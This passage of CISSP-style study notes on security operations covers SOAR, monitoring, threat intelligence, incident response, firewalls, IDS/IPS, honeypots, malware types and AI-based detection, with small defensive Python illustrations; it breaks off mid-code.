7.2.3 Security orchestration, automation and response (SOAR)
Security Orchestration, Automation, and Response (SOAR): refers to a group of technologies that
allow orgs to respond to some incidents automatically; SOAR tech automates responses to incidents; a
primary benefit is that this reduces the workload of admins, and it removes/reduces the possibility of
human error by having a computer/system respond
Playbook: a document or checklist that defines how to verify an incident
Runbook: implements the playbook data into an automated tool
SOAR allows security admins to define these incidents and the response, typically using playbooks and
runbooks
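The playbook/runbook relationship can be sketched as data driving automation: the playbook's verified steps become an ordered list of automated actions keyed by incident type (all function names here are illustrative, not a real SOAR API):

```python
# Hypothetical response actions a runbook would invoke.
def isolate_host(host):      return f"isolated {host}"
def disable_account(user):   return f"disabled {user}"
def open_ticket(summary):    return f"ticket: {summary}"

# The runbook: ordered, automated steps per incident type.
RUNBOOK = {
    "malware_detected": [
        lambda inc: isolate_host(inc["host"]),
        lambda inc: disable_account(inc["user"]),
        lambda inc: open_ticket(f"malware on {inc['host']}"),
    ],
}

def respond(incident: dict) -> list[str]:
    """Execute each automated step defined for this incident type, in order."""
    return [step(incident) for step in RUNBOOK.get(incident["type"], [])]
```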
Both SOAR and SIEM platforms can help detect and, in the case of SOAR, respond to threats against your
software development efforts
devs can be resistant to anything that slows down the development process, and this is where
DevSecOps can help build the right culture, and balance the needs of developers and security
7.2.4 Continuous monitoring and tuning
Effective continuous monitoring encompasses technology, processes, and people
Continuous monitoring steps are:
Define
Establish
Implement
Analyze/report
Respond
Review/update
Monitoring: the process of reviewing information logs, looking for something specific
necessary to detect malicious actions by subjects as well as attempted intrusions and system
failures
can help reconstruct events, provide evidence for prosecution, and create reports for analysis
continuous monitoring ensures that all events are recorded and can be investigated later if
necessary
monitoring is a form of auditing that focuses on active review of log file data; it's used to hold
subjects accountable for their actions and to detect abnormal or malicious activities
it is also used to gauge system performance
tools like IDSs and SIEMs automate continuous monitoring and provide real-time analysis of events,
including monitoring both ingress and egress network traffic
Log analysis: a detailed and systematic form of monitoring where logged info is analyzed for trends and
patterns as well as abnormal, unauthorized, illegal, and policy-violating activities
log analysis isnʼt necessarily in response to an incident, itʼs a periodic task
After a SIEM is set up, configured, tuned, and running, it must be routinely updated and continuously
monitored to function effectively
Tuning: tuning a SIEM is inherently the process of reducing false positives (incorrectly classifying a
benign activity, system state, or configuration as malicious or vulnerable), while not incurring false
negatives (NOT alerting on a true malicious activity or vulnerability); false positives can result in analyst
fatigue and reduced efficiency
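Tuning progress can be tracked with two simple ratios — the fraction of alerts that were real (which tuning should raise) and the fraction of real incidents missed (which tuning must not raise). A minimal sketch:

```python
def alert_precision(true_positives: int, false_positives: int) -> float:
    """Fraction of alerts that were real incidents; tuning should raise this."""
    total = true_positives + false_positives
    return true_positives / total if total else 0.0

def false_negative_rate(false_negatives: int, true_positives: int) -> float:
    """Fraction of real incidents the SIEM missed; tuning must not raise this."""
    total = false_negatives + true_positives
    return false_negatives / total if total else 0.0
```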
7.2.5 Egress monitoring
Itʼs important to monitor traffic exiting as well as entering a network, and Egress monitoring refers to
monitoring outgoing traffic to detect unauthorized data transfer outside the org (AKA data exfiltration)
Common methods used to detect or prevent data exfiltration are data loss prevention (DLP)
techniques and monitoring for steganography
7.2.6 Log management
Log management: refers to all the methods used to collect, process, analyze, and protect log entries
(see SIEM definition above)
rollover logging: allows admins to set a maximum log size, when the log reaches that max, the system
begins overwriting the oldest events in the log
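Python's standard library offers a close analogue: `RotatingFileHandler` rolls to a new file at a maximum size rather than overwriting the oldest entries in place, with `backupCount` capping total history (the path here is illustrative):

```python
import logging
import logging.handlers
import os
import tempfile

# Roll over at maxBytes; keep at most backupCount old log files.
log_path = os.path.join(tempfile.mkdtemp(), "audit.log")
handler = logging.handlers.RotatingFileHandler(
    log_path, maxBytes=10_000, backupCount=3
)
logger = logging.getLogger("audit")
logger.addHandler(handler)
logger.warning("user bob escalated privileges")
```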
7.2.7 Threat intelligence (e.g. threat feeds, threat hunting)
Threat intelligence: an umbrella term encompassing threat research and analysis and emerging threat
trends; gathering data on potential threats, including various sources to get timely info on current threats;
information that is aggregated, transformed, analyzed, interpreted, or enriched to provide the necessary
context for the decision-making process
Threat feed: a steady stream of raw threat data that provides security admins with timely info on
current threats; using this knowledge to search through the network for signs of those threats is
known as threat hunting
Structured Threat Information eXpression (STIX): a standardized language that uses a JSON-based
lexicon to express and share threat intelligence information in a readable and consistent format
Trusted Automated eXchange of Intelligence Information (TAXII): the format through which threat
intelligence data is transmitted; TAXII is a transport protocol that supports transferring STIX insights over
Hyper Text Transfer Protocol Secure (HTTPS)
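An abridged STIX 2.1 indicator might look like the following — a JSON object whose `pattern` marks traffic to a given IP as an indicator of compromise; the serialized JSON is what TAXII transports over HTTPS (the ID and IP are illustrative, and required fields such as `created`/`modified` are omitted for brevity):

```python
import json

# Abridged STIX 2.1 indicator object (illustrative values).
indicator = {
    "type": "indicator",
    "spec_version": "2.1",
    "id": "indicator--d81f86b9-975b-4c0b-875b-a0eb4a1a2e47",
    "name": "Known C2 server",
    "pattern": "[ipv4-addr:value = '198.51.100.7']",
    "pattern_type": "stix",
    "valid_from": "2025-06-11T00:00:00Z",
}
stix_json = json.dumps(indicator)  # this JSON payload is what TAXII moves over HTTPS
```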
Kill chain: military model (used for both offense and defense):
find/identify a target through reconnaissance
get the targetʼs location
track the targetʼs movement
select a weapon to use on the target
engage the target with the selected weapon
evaluate the effectiveness of the attack
Orgs have adapted this model for cybersecurity: Lockheed Martin created the Cyber Kill Chain
framework including seven ordered stages of an attack:
reconnaissance: attackers gather info on the target
weaponization: attackers identify an exploit that the target is vulnerable to, along with methods to
send the exploit
delivery: attackers send the weapon to the target via phishing attacks, malicious email
attachments, compromised websites, or other common social engineering methods
exploitation: the weapon exploits a vulnerability on the target system
installation: code that exploits the vulnerability then installs malware with a backdoor allowing
attacker remote access
command and control: attackers maintain a command and control system, which controls the
target and other compromised systems
actions on objectives: attackers execute their original goals such as theft of money, or data,
destruction of assets, or installing additional malicious code (eg. ransomware)
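The seven stages above can be modeled as an ordered list; mapping an observed event to its stage tells defenders how far an attack has progressed (a simple sketch):

```python
# The seven Cyber Kill Chain stages, in order.
KILL_CHAIN = [
    "reconnaissance", "weaponization", "delivery", "exploitation",
    "installation", "command and control", "actions on objectives",
]

def attack_progress(observed_stage: str) -> int:
    """1-based position in the chain; earlier detection means cheaper response."""
    return KILL_CHAIN.index(observed_stage) + 1
```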
7.2.8 User and Entity Behavior Analytics (UEBA)
UEBA (aka UBA): focuses on the analysis of user and entity behavior as a way of detecting inappropriate
or unauthorized activity (e.g. fraud, malware, insider attacks etc); analysis engines are typically included
with SIEM solutions or may be added via subscription; UEBA tools develop profiles of individual behavior
and monitor users for deviations from those profiles that may indicate malicious activity and/or
compromised accounts
Behavior-based detection: AKA statistical intrusion, anomaly, and heuristics-based detection, starts by
creating a baseline of normal activities and events; once enough baseline data has been accumulated to
determine normal activity, it can detect abnormal activity (that may indicate a malicious intrusion or
event)
Behavior-based IDSs use the baseline, activity statistics, and heuristic evaluation techniques to compare
current activity against previous activity to detect potentially malicious events
Static code scanning techniques: the scanner scans code in files, similar to white box testing
Dynamic techniques: the scanner runs executable files in a sandbox to observe their behavior
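A toy sketch of the UEBA idea: build a per-user baseline (here, typical login hours) and flag activity outside the learned profile (the profiled attribute is illustrative — real tools model many behaviors at once):

```python
from collections import defaultdict

profiles = defaultdict(set)   # user -> set of login hours seen during baselining

def baseline(user: str, hour: int) -> None:
    """Accumulate normal-activity data into the user's profile."""
    profiles[user].add(hour)

def is_deviation(user: str, hour: int) -> bool:
    """True when a login hour was never seen while building the baseline."""
    return hour not in profiles[user]
```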
7.3 Perform Configuration Management (CM) (e.g. provisioning, baselining,
automation) (OSG-10 Chpt 16)
Configuration Management (CM): collection of activities focused on establishing and maintaining the integrity
of IT products and info systems, via the control of processes for initializing, changing, and monitoring the
configurations of those products/systems through their lifecycle; CM is the process of identifying, controlling,
and verifying the configuration of systems and components throughout their lifecycle
the three basic components of change control: request control, change control, and release control
CM is an integral part of secure provisioning and relates to the proper configuration of a device at the
time of deployment
CM helps ensure that systems are deployed in a secure, consistent state and that they stay in a secure,
consistent state throughout their lifecycle
Provisioning: taking a particular config baseline, making additional or modified copies, and placing those
copies into the environment in which they belong; refers to installing and configuring the operating system and
needed apps on new systems
new systems should be configured to reduce vulnerabilities introduced via default configurations; the key
is to harden a system based on intended usage
Hardening a system: process of applying security configurations, and locking down various hardware,
communications systems, software (e.g. OS, web/app server, apps etc); normally performed based on industry
guidelines and benchmarks like the Center for Internet Security (CIS);
makes it more secure than the default configuration and includes the following:
disable all unused services
close all unused logical ports
remove all unused apps
an example of how SoD can be enforced is dividing the security or admin capabilities and functions
among multiple trusted individuals
Two-person control: (AKA two-man rule) requires the approval of two individuals for critical tasks
using two-person controls within an org ensures peer review and reduces the likelihood of collusion
and fraud
ex: privileged access management (PAM) solutions that create special admin accounts for
emergency use only; perhaps a password is split in half so that two people need to enter the
password to log on
Split knowledge: combines the concepts of separation of duties and two-person control into a single
solution; the info or privilege required to perform an operation is divided among two or more users,
ensuring that no single person has sufficient privileges to compromise the security of the environment; M
of N control is an example of split knowledge
Principles such as least privilege and separation of duties help prevent security policy violations,
and monitoring helps to deter and detect any violations that occur despite the use of preventive
controls
Collusion: an agreement among multiple people to perform some unauthorized or illegal actions;
implementing SoD, two-person control, or split knowledge policies help prevent fraud by limiting
actions individuals can do without colluding with others
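Split knowledge can be sketched naively by splitting a secret so no single holder can use it alone — note this toy split requires all holders (N-of-N); a real M-of-N control would use a secret-sharing scheme such as Shamir's:

```python
def split_secret(secret: str, parts: int) -> list[str]:
    """Naive split: each holder gets one contiguous slice of the secret."""
    size = -(-len(secret) // parts)            # ceiling division
    return [secret[i:i + size] for i in range(0, len(secret), size)]

def recover(shares: list[str]) -> str:
    """Recovery needs every share, so no one person can act alone."""
    return "".join(shares)
```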
7.4.3 Privileged account management
Privileged entities are trusted, but they can abuse privileges, and it's therefore essential to monitor all
assignments of privileged operations
The goal is to ensure that trusted employees do not abuse the special privileges that are granted;
monitoring these operations can also detect many attacks, because attackers commonly use special
privileges during an attack
Advanced privileged account management practices can limit the time users have advanced privileges
Privileged Account Management (PAM): solutions that restrict access to privileged accounts or detect
when accounts use any elevated privileges (e.g. admin accounts)
in Microsoft domains, this includes local admin accounts and the Domain Admins and Enterprise Admins groups
in Linux, this includes root and sudo accounts
PAM solutions should monitor actions taken by privileged accounts, such as creating new user accounts,
adding new routes to a routing table, altering the config of a firewall, and accessing system log and audit files
7.4.4 Job rotation
Job rotation: (AKA rotation of duties) means that employees rotate through jobs or rotate job
responsibilities with other employees
using job rotation as a security control provides peer review, reduces fraud, and enables cross-
training
job rotation policy can act as both a deterrent and a detection mechanism
7.4.5 Service Level Agreements (SLA)
Service Level Agreement (SLA): an agreement between an organization and an outside entity, such as a
vendor, where the SLA stipulates performance expectations and often includes penalties if the vendor
doesnʼt meet these expectations
Memorandum of Understanding (MOU): documents the intention of two entities to work together
toward a common goal
7.5 Apply resource protection (OSG-10 Chpt 16)
Media management should consider all types of media as well as short- and long-term needs and evaluate:
Confidentiality
Access speeds
Portability
Durability
Media format
Data format
For the test, data storage media should include any of the following:
Paper
Microforms (microfilm and microfiche)
Magnetic (HD, disks, and tapes)
Flash memory (SSD and memory cards)
Optical (CD and DVD)
Mean Time Between Failure (MTBF) is an important criterion when evaluating storage media, especially where
valuable or sensitive information is concerned
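MTBF is simply total operating time divided by the number of failures; for example, a drive population that logged 10,000 operating hours across 4 failures has an MTBF of 2,500 hours:

```python
def mtbf(total_operating_hours: float, failures: int) -> float:
    """Mean Time Between Failures: average operating time between breakdowns."""
    return total_operating_hours / failures if failures else float("inf")
```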
Media management includes the protection of the media itself, which typically involves policies and procedures,
access control mechanisms, labeling and marking, storage, transport, sanitization, use, and end-of-life
7.5.1 Media management
Media management: refers to the steps taken to protect media (i.e. anything that can hold data) and the
data stored on that media; includes most portable devices (e.g. smart phones, memory/flash cards etc)
media is protected throughout its lifetime and destroyed when no longer needed
As above, OSG-9 also refers to tape media, as well as “hard-copy data”
7.5.2 Media protection techniques
If media includes sensitive info, it should be stored in a secure location with strict access controls to
prevent loss due to unauthorized access
any location used to store media should have temperature and humidity controls to prevent losses
due to corruption
Media management can also include technical controls to restrict device access from computer systems
When media is marked, handled, and stored properly, it helps prevent unauthorized disclosure (loss of
confidentiality), unauthorized modification (loss of integrity), and unauthorized destruction (loss of
availability)
7.5.3 Data at rest/data in transit
This was previously covered in Domain 2 (see 2.6.4) - Data at rest and data in transit can be protected via
encryption
7.6 Conduct incident management (OSG-10 Chpt 17)
Analysis: Gathering and analyzing information about the incident to determine its scope, impact, and root
cause (e.g., by interviewing witnesses, collecting and analyzing evidence, and reviewing system logs)
Containment: Limiting the impact of the incident and preventing further damage (e.g., by isolating affected
systems, changing passwords, and implementing security controls)
Eradication: Removing the cause of the incident from the environment (e.g., by removing malware, patching
vulnerabilities, and disabling compromised accounts)
Incident response (IR): the mitigation of violations of security policies and recommended practices; the
process to detect and respond to incidents and to reduce the impact when incidents occur; IR attempts to keep
a business operating or restore operations as quickly as possible in the wake of an incident
Incident management is usually conducted by an Incident Response Team (IRT), which comprises individuals
with the required expertise and experience to manage security incidents; the IRT is accountable for
implementing the incident response plan, which is a written record that defines the processes to be followed
during each stage of the incident response cycle
The main goals of incident response:
Provide an effective and efficient response to reduce impact to the organization
Maintain or restore business continuity
Defend against future attacks
An important distinction needs to be made to know when an incident response process should be initiated:
events take place continually, and the vast majority are insignificant; however, events that lead to some type of
adversity can be deemed incidents, and those incidents should trigger an org's incident response process steps
Incident Response Summary:
| Step | Stage | Action/Goal |
| --- | --- | --- |
| Preparation | | |
| (D)etection | Triage | identification |
| (R)esponse | Triage | activate IR team |
| (M)itigation | Investigate | containment |
| (R)eporting | Investigate | |
| (R)ecovery | Recovery | return to normal |
| (R)emediation | Recovery | prevention |
| (L)essons Learned | Recovery | improve process |
The following steps (Detection, Response, Mitigation, Reporting, Recovery, Remediation, and Lessons Learned)
are on the exam; you can use the mnemonic DRMRRRL (drumroll)
In summary: after detecting and verifying an incident, the first response is to limit or contain the scope of
the incident while protecting evidence; based on governing laws, an org may need to report an incident to
official authorities, and if PII is affected, individuals need to be informed; the remediation and lessons
learned stages include root cause analysis to determine the cause and recommend solutions to prevent
reoccurrence
Preparation: includes developing the IR process, assigning IR team members, and everything related to what
happens when an incident is identified; preparation is critical, and will anticipate the steps to follow
7.6.1 Detection
Detection: the identification of potential security incidents via monitoring and analyzing security logs,
threat intelligence, or incident reports; as above, understanding the distinction between an event and an
incident, the goal of detection is to identify an adverse event (an incident) and begin dealing with it
Common methods to detect incidents:
intrusion detection and prevention systems
antimalware
automated tools that scan audit logs looking for predefined events
end users sometimes detect irregular activity and contact support
Note: receiving an alert or complaint doesnʼt always mean an incident has occurred
7.6.2 Response
After detecting and verifying an incident, the next step is to activate an Incident Response (IR) or
CSIRT team
An IR team is AKA a computer incident response team (CIRT) or computer security incident response
team (CSIRT)
Among the first steps taken by the IR Team will be an impact assessment to determine the scale of the
incident, how long the impact might be experienced, who else might need to be involved etc.
The IR team typically investigates the incident, assesses the damage, collects evidence, reports the
incident, performs recovery procedures, and participates in the remediation and lessons learned stages,
helping with root cause analysis
it's important to protect all data as evidence during an investigation, and computers should not be
turned off
7.6.3 Mitigation
Mitigation: attempt to contain an incident; in addition to conducting an impact assessment, the IR Team
will attempt to minimize or contain the damage or impact from the incident
The IR Team's job at this point is not to fix the problem; it's simply to try and prevent further damage
Note this may involve disconnecting a computer from the network; sometimes responders take steps to
mitigate the incident, but without letting the attacker know that the attack has been detected
7.6.4 Reporting
Reporting occurs throughout the incident response process
Once an incident is mitigated, formal reporting occurs because numerous stakeholders often need to
understand what has happened
Jurisdictions may have specific laws governing the protection of personally identifiable information (PII),
and orgs must report if it has been exposed
Additionally, some third-party standards, such as the Payment Card Industry Data Security Standard (PCI
DSS), require orgs to report certain security incidents to law enforcement
7.6.5 Recovery
Recovery is the next step, returning a system to a fully functioning state
Recovery: Restoring systems and data to their normal state (e.g., by restoring from backups, rebuilding
systems, and re-enabling compromised accounts); at this point, the goal is to start returning to normal
The most secure method of restoring a system after an incident is completely rebuilding the system from
scratch, including restoring all data from the most recent backup
effective configuration and change management will provide the necessary documentation to
ensure the rebuilt systems are configured properly
According to the OSG, you should check these areas as part of recovery:
access control lists (ACLs), including firewall or router rules
services and protocols, ensuring unneeded services and protocols are disabled or removed
patches
user accounts, ensuring they have changed from default configs
known compromises have been reversed
7.6.6 Remediation
Remediation: changes to a system's config to immediately limit or reduce the chance of reoccurrence of
an incident
Remediation stage: personnel look at the incident, identify what allowed it to occur, and then implement
methods to prevent it from happening again
Remediation includes performing a root cause analysis (which examines the incident to determine what
allowed it to happen), and if the root cause analysis identifies a vulnerability that can be mitigated, this
stage will recommend a change
7.6.7 Lessons Learned
Lessons Learned: documenting the incident and learning from it to improve future responses (e.g., by
identifying areas where the incident response process can be improved and by sharing lessons learned
with other organizations); lessons learned stage is an all-encompassing view of the situation related to an
incident, where personnel, including the IR team and other key stakeholders, examine the incident and the
response to see if there are any lessons to be learned
the output of this stage can be fed back to the detection stage of incident management
It's common for the IR team to create a report when they complete a lessons learned review
based on the findings, the team may recommend changes to procedures, the addition of security
controls, or even changes to policies
management will decide what recommendations to implement and is responsible for the remaining
risk for any recommendations they reject
NOTE: Incident management DOES NOT include a counterattack against the attacker
7.7 Operate and maintain detection and preventative measures (OSG-10 Chpts
11,17,21)
As noted in Domain 1, a preventive or preventative control is deployed to thwart or stop unwanted or
unauthorized activity from occurring
Examples:
fences
locks
biometrics
separation of duties policies
job rotation policies
data classification
access control methods
encryption
smart cards
callback procedures
security policies
security awareness training
antivirus software
firewalls
intrusion prevention systems
A detective control is deployed to discover or detect unwanted or unauthorized activity; detective controls
operate after the fact
Examples:
Internal Segmentation Firewall (ISFW): used within a network to segment internal traffic and
control access between different parts of an org; an ISFW monitors and filters traffic between
network segments (such as between the finance department and HR), preventing lateral movement
of threats within the network; provides internal protection by monitoring east-west traffic, reduces
the risk of an insider threat or lateral movement, and can enforce micro-segmentation, but can be
complex to configure and manage
| Firewall Type | OSI Layers | Key Features | Strengths | Weaknesses |
| --- | --- | --- | --- | --- |
| Static Packet Filtering | Layer 3 (Network) | Basic filtering on source/destination IPs and ports | Fast, low overhead | No context awareness, can't inspect data payload |
| Application-Level | Layer 7 (Application) | Inspects application-level data | Deep inspection, blocks specific applications | High processing overhead, slower performance |
| Circuit-Level | Layer 5 (Session) | Validates session establishment | Low overhead, monitors session validity | No payload inspection, can't detect deeper threats |
| Stateful Inspection | Layers 3-4 (Network, Transport) | Tracks connection states across sessions | Better security than static filtering | Doesn't inspect data at the application layer |
| NGFW | Layers 3-7 | Combines stateful inspection with deep packet inspection, IPS, and app control | Comprehensive threat detection, application-aware | Expensive, high resource usage |
| ISFW | Internal | Filters traffic between internal network segments | Prevents lateral movement, enforces micro-segmentation | Complex configuration, typically for internal use |
7.7.2 Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS)
Intrusion Detection Systems (IDSs) and Intrusion Prevention Systems (IPSs) are two methods
organizations typically implement to detect and prevent attacks
Intrusion detection: a specific form of monitoring events, usually in real time, to detect abnormal activity
indicating a potential incident or intrusion
Intrusion Detection System (IDS) automates the inspection of logs and real-time system events to
detect intrusion attempts and system failures
IDSs are an effective method of detecting many DoS and DDoS attacks
an IDS actively watches for suspicious activity by monitoring network traffic and inspecting logs
an IDS is intended as part of a defense-in-depth security plan
knowledge-based detection: AKA signature-based or pattern-matching detection, the most
common method used by an IDS
behavior-based detection: AKA statistical intrusion, anomaly, and heuristics-based detection;
behavior-based IDSs use baseline, activity stats, and heuristic eval techniques to compare current
activity against previous activity to detect potentially malicious events
Because an IPS includes detection capabilities, youʼll see them referred to as intrusion detection and
prevention systems (IDPSs)
an IPS includes all the capabilities of an IDS but can also take additional steps to stop or prevent
intrusions
IDS/IPS should be deployed at strategic network locations to monitor traffic, such as at the perimeters, or
between network segments, and should be configured to alert for specific types of scans and traffic
patterns
See NIST SP 800-94
7.7.3 Whitelisting/blacklisting
A method used to control which applications can and canʼt run is via allow lists and deny lists (AKA
whitelists and blacklists)
Application whitelisting or allow listing is a security option prohibiting unauthorized software from
executing; AKA deny by default or implicit deny
Allow list: identifies a list of apps authorized to run on a system and blocks all other apps
Deny list: identifies a list of apps that are not authorized to run on a system
Allow and deny lists are used for applications to help prevent malware infections
Important to note: a system would only use one list, either allow or deny
Apple iOS running on iPhones/iPads is an example of an extreme version of an allow list; users are only
able to install apps from the App Store
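Deny-by-default application control reduces to a set-membership check — anything not on the allow list is blocked (app names are illustrative, and a real system would use only one list type):

```python
# Illustrative allow list; everything absent from it is implicitly denied.
ALLOW_LIST = {"notepad.exe", "excel.exe", "chrome.exe"}

def may_execute(app: str) -> bool:
    """Deny by default: only explicitly listed apps are permitted to run."""
    return app.lower() in ALLOW_LIST
```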
7.7.4 Third-party provided security services
Some orgs outsource security services such as auditing and penetration testing to third party security
services
Some outside compliance entities (e.g. PCI DSS) require orgs to ensure that service providers comply
OSG also mentions that some SaaS vendors provide security services via the cloud (e.g. next-gen
firewalls, UTM devices, and email gateways for spam and malware filtering)
7.7.5 Sandboxing
Sandboxing: refers to a security technique where a separate, secure environment is created to run and
analyze untested or untrusted programs or code without risking harm to the host device or network; this
isolated environment, known as a sandbox, effectively contains the execution of the code, allowing it to
run and behave as if it were in a normal computing environment, but without the ability to affect the host
system or access critical resources and data
Confinement: restriction of a process to certain resources, or reading from and writing to certain
memory locations; bounds are the limits of memory a process cannot exceed when reading or
writing; isolation is using bounds to create/enforce confinement
Sandboxing provides a security boundary for applications and prevents the app from interacting with
other apps; can be used as part of development, integration, or acceptance testing, as part of malware
screening, or as part of a honeynet
7.7.6 Honeypots/honeynets
Honeypots: individual computers created as a trap or a decoy for intruders or insider threats; a honeypot
typically has pseudo flaws and fake data to lure attackers
Honeynet: two or more networked honeypots used together to simulate a network; admins can observe
an attackerʼs activity while they are in a honeypot, keeping them occupied instead of attacking the
production network
They look and act like legit systems, but they do not host data of any real value for an attacker; admins
often configure honeypots with vulnerabilities to tempt intruders into attacking them
In addition to keeping the attacker away from a production environment, the honeypot allows
administrators to observe an attackerʼs activity without compromising the live environment
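The decoy concept can be sketched as a bare listener that records connection attempts instead of serving real data; this is illustrative only (a real honeypot emulates services and pseudo flaws, and the port handling here is simplified):

```python
import socket
import threading

# Minimal decoy listener: accepts one connection and records the attempt.
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.bind(("127.0.0.1", 0))          # OS picks a free port for the decoy
srv.listen(1)
port = srv.getsockname()[1]
log = []

def observe():
    conn, addr = srv.accept()
    # record what the intruder does instead of letting it touch production
    log.append({"source": addr[0], "probe": conn.recv(64)})
    conn.close()

t = threading.Thread(target=observe)
t.start()

# simulate an attacker probing the decoy
attacker = socket.create_connection(("127.0.0.1", port))
attacker.sendall(b"GET / HTTP/1.0\r\n")
attacker.close()
t.join()
srv.close()

print(log[0]["source"])  # 127.0.0.1: the admin observed the activity safely
```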
7.7.7 Anti-malware
Malware: program inserted into a system with the intent of compromising the CIA of the victim's data,
applications, or OS; malicious software that negatively impacts a system
The most important protection against malicious code is the use of antimalware software with up-to-date
signature files and heuristic capabilities
multi-pronged approach with antimalware software on each system in addition to filtering internet
content helps protect systems from infections
following the principle of least privilege and ensuring users do not have admin permissions on systems
means users won't be able to install apps that may be malicious
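The signature-file approach mentioned above can be sketched as hash matching; the "signature database" here is a hypothetical stand-in (real products ship frequently updated feeds of hashes and byte patterns):

```python
import hashlib

def sha256_of(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

# Hypothetical signature database: in real antimalware products this is a
# vendor-maintained, frequently updated feed of known-malware signatures.
sample_malware = b"this-stands-in-for-a-malicious-binary"
KNOWN_BAD_HASHES = {sha256_of(sample_malware)}

def scan(data: bytes) -> bool:
    """Signature check: flag content whose hash matches a known-bad entry.

    This is why up-to-date signatures matter: a hash only matches malware
    the vendor has already seen, which is also why heuristic capabilities
    are layered on top.
    """
    return sha256_of(data) in KNOWN_BAD_HASHES

print(scan(sample_malware))         # True
print(scan(b"benign file"))         # False
print(scan(sample_malware + b"!"))  # False: one changed byte defeats the hash
```

The last line also illustrates why polymorphic malware (covered below) evades naive signature matching: any self-modification changes the hash.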
These are the characteristics of each malware type:
virus: software written with the intent/capability to copy and disperse itself without direct owner
knowledge/cooperation; the defining characteristic is that it's a piece of malware that has to be
triggered in some way by the user; program that modifies other programs to contain a possibly
altered version of itself
viruses use four main propagation techniques:
file infection
service injection
boot sector infection
macro infection
worm: software written with the intent/capability to copy and disperse without owner
knowledge/cooperation, but without needing to modify other programs to contain copies of itself;
malware that can self-propagate and spread through a network or a series of systems on its own by
exploiting a vulnerability in those systems
companion: helper software that is not malicious on its own; it could be something like a wrapper
that accompanies the actual malware
macro: associated with Microsoft Office products, and is created using a straightforward
programming language to automate tasks; macros can be programmed to be malicious and harmful
multipartite: means the malware spreads in different ways (e.g. Stuxnet)
polymorphic: malware that can change aspects of itself as it replicates to evade detection (e.g. file
name, file size, code structure etc)
trojan: a Trojan horse is malware that looks harmless or desirable but contains malicious code;
trojans are often found in easily downloadable software; a trojan inserts backdoors or trapdoors
into other programs or systems
bot: short for robot, a system compromised by malware and placed under an attacker's remote
control; bots carry out automated tasks (e.g. sending spam, participating in DDoS attacks) on
the controller's behalf
bot herder: someone who controls a botnet, using a command-and-control server to remotely
control the zombies to launch attacks on other systems or send spam/phishing emails; bot herders
can also rent botnet access out to other criminals
botnet: a collection of compromised computing devices (called bots or zombies), organized in a
network controlled by a criminal known as a bot herder; these many infected systems that have
been harnessed together and act in unison;
boot sector infectors: pieces of malware that can install themselves in the boot sector of a drive
fileless malware: leaves no trace of its presence nor saves itself to a storage device, but is still
able to stay resident and active on a computer
hoaxes/pranks: not actually software, they're usually part of social engineering—via email or other
means—that intends harm (hoaxes) or a joke (pranks)
logic bomb: malware inserted into a program which will activate and perform functions suiting the
attacker when some later date/conditions are met; code that will execute based on some triggering
event
stealth: malware that uses various active techniques to avoid detection
ransom attack: any form of attack which threatens the destruction, denial, or unauthorized public
release/remarketing of private information assets; usually involves encrypting assets and
withholding the decryption key until a ransom is paid
ransomware: type of malware that typically encrypts a system or a network of systems, effectively
locking users out, and then demands a ransom payment (usually in the form of a digital currency)
to gain access to the decryption key
rootkit: Similar to stealth malware, a rootkit attempts to mask its presence on a system; malware
that embeds itself deeply in an OS; term is derived from the concept of rooting and a utility kit of
hacking tools; rooting is gaining total or full control over a system; typically includes a collection of
malware tools that an attacker can utilize according to specific goals
zero-day: is any type of malware that's never been seen in the wild before, and the vendor of the
impacted product is unaware (or hasn't issued a patch), as are security companies that create anti-
malware software intended to protect systems; previously unreported vuln which can be potentially
exploited without risk of detection or prevention until system owner/developer detects and corrects
vuln; gets name from the "zero time" being the time at which the exploit or vuln is first identified by
the systems' owners or builders; AKA zero-hour exploit, zero-day attack; mitigations include basic
security practices including disabling unneeded protocols/services, using appropriate firewalls,
IDS/IPS, and honeypots
7.7.8 Machine learning and Artificial Intelligence (AI) based tools
AI: gives machines the ability to do things that a human can do better or allows a machine to perform
tasks that we previously thought required human intelligence
Machine Learning: a subset of AI and refers to a system that can improve automatically through
experience
an ML system starts with a set of rules or guidelines; ML techniques attempt to algorithmically
discover knowledge from datasets
an AI system starts with nothing, progressively learns the rules, and creates its own algorithms,
applying ML techniques based on the rules it discovers
Behavior-based detection is one way ML and AI can apply to cybersecurity
an admin creates a baseline of normal activities and traffic on a network; the baseline in this case is
similar to a set of rules given to an ML system
during normal operations, it detects anomalies and reports them; if the detection is a false positive
(incorrectly classifying a benign activity, system state, or configuration as malicious or vulnerable),
the ML system learns
An AI system starts without a baseline, monitors traffic and slowly creates its own baseline based on the
traffic it observes
as it creates the baseline it also looks for anomalies
an AI system also relies on feedback from admins to learn if alarms are valid or false positives
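The baseline-plus-feedback loop described above can be sketched with a simple statistical threshold; the traffic numbers and the 3-sigma cutoff are illustrative assumptions, not how any particular product works:

```python
from statistics import mean, stdev

# Baseline: requests/minute observed during a training window (the "normal"
# activity an admin establishes, or an AI system builds up by observation).
baseline = [95, 102, 98, 110, 105, 99, 101, 97, 103, 100]

mu, sigma = mean(baseline), stdev(baseline)

def is_anomaly(observation: float, k: float = 3.0) -> bool:
    """Flag observations more than k standard deviations from the baseline mean."""
    return abs(observation - mu) > k * sigma

def record_feedback(observation: float, false_positive: bool) -> None:
    """Crude 'learning': fold admin-confirmed benign values back into the baseline."""
    global mu, sigma
    if false_positive:
        baseline.append(observation)
        mu, sigma = mean(baseline), stdev(baseline)

print(is_anomaly(101))   # False: within the normal range
print(is_anomaly(400))   # True: anomalous; an admin confirms attack or false positive
```

The `record_feedback` step is the part the section emphasizes: the system improves as admins tell it which alarms were false positives.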
Neural networks: try to simulate the functioning of the human brain by arranging a series of layered
calculations to solve problems; neural networks require extensive training on a particular problem before
they are able to offer solutions
Expert systems: a branch of AI that uses knowledge-based systems to emulate the decision-making
ability of human experts; expert systems have two main components: a knowledge base that uses a series
of if/then rules, and an inference engine that harnesses that info to draw conclusions about other data
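The two components can be sketched as forward chaining over if/then rules; the rules themselves are hypothetical examples, not from any real product:

```python
# Knowledge base: if/then rules captured from human experts (hypothetical).
RULES = [
    ({"failed_logins_high", "new_admin_account"}, "possible_account_takeover"),
    ({"outbound_traffic_spike", "off_hours"}, "possible_data_exfiltration"),
    ({"possible_account_takeover"}, "open_incident_ticket"),
]

def infer(facts: set) -> set:
    """Inference engine: forward-chain over the rules until no new facts appear."""
    facts = set(facts)
    changed = True
    while changed:
        changed = False
        for conditions, conclusion in RULES:
            # fire a rule when all of its conditions are known facts
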